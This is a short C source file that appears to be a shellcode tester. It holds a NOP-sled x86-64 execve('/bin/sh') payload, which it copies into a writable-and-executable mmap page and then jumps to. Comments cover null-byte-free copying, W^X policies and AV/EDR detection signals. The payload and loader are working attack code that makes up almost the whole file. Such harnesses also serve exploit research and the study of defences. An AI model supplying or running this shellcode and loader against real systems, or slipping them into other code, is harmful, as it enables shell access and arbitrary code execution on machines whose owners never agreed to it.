Copy Shellcode into a Write Exec mmap()'d area, and jump to it.
#include <string.h> | |
#include <sys/mman.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <string.h> | |
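/*
 * NOP padded execve("/bin/sh") payload (x86-64 machine code; the final
 * bytes load 0x3b into %al and execute `syscall`).
 *
 * The leading run of 0x90 bytes is single-byte NOP padding in front of the
 * payload proper. The array contains no 0x00 byte before the string
 * literal's own terminator, which is why a C string copy transfers all of it.
 *
 * Defender note: a long 0x90 run followed by a short syscall stub is a
 * classic static signature, so this file may be flagged by AV/EDR scanners.
 */
char *sc =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";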
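/*
 * Test harness: map one anonymous page as writable + executable, copy the
 * bytes of `sc` into it, and call the page as a function.
 *
 * Returns EXIT_FAILURE if the page size cannot be read, the payload does not
 * fit in one page, or the mapping is refused. The call through `f` is not
 * expected to return when the payload's execve succeeds; if it does return,
 * main returns 0.
 *
 * Security context: a simultaneously writable and executable anonymous
 * mapping is exactly what W^X policies exist to forbid. On systems that
 * enforce such a policy (for example SELinux without the execmem permission)
 * the mmap() below fails, so its result must be checked before use. The same
 * PROT_WRITE|PROT_EXEC anonymous mmap is also a useful detection signal when
 * auditing process behaviour.
 */
int main(int argc, char **argv){
    (void)argc;
    (void)argv;

    // Let's use mmap to create a page of memory to write sc to.
    long page_size = sysconf(_SC_PAGESIZE);
    if(page_size <= 0){
        // sysconf returns -1 on error; a non-positive size cannot be mapped.
        perror("sysconf");
        return EXIT_FAILURE;
    }
    printf("The page size is 0x%lx\n", page_size);

    // Address hint only: MAP_FIXED is not set, so the kernel may place the
    // mapping elsewhere. The address actually used is printed below.
    void *start = (void*)(page_size * 3);

    // Copy length includes the terminating NUL, matching the original strcpy.
    size_t sc_len = strlen(sc) + 1;
    if(sc_len > (size_t)page_size){
        fprintf(stderr, "shellcode (%zu bytes) does not fit in one page\n", sc_len);
        return EXIT_FAILURE;
    }

    // Create one page of WX memory for the shellcode.
    // fd is -1 because some implementations require that for MAP_ANONYMOUS.
    void *memory = mmap(start, page_size, (PROT_WRITE | PROT_EXEC), MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if(memory == MAP_FAILED){
        perror("mmap error:");
        // Do not fall through: MAP_FAILED is (void *)-1, and writing to it or
        // calling it would crash instead of reporting the refusal.
        return EXIT_FAILURE;
    }
    printf("Got a memory region at %p\n", memory);

    // Let's copy the shellcode into memory region (bounded by the check above).
    memcpy(memory, sc, sc_len);

    // The original cast `(int (*))memory` is a cast to `int *`, not to a
    // function pointer; spell out the function-pointer type explicitly.
    int (*f)(void) = (int (*)(void))memory;
    f();
    return 0;
}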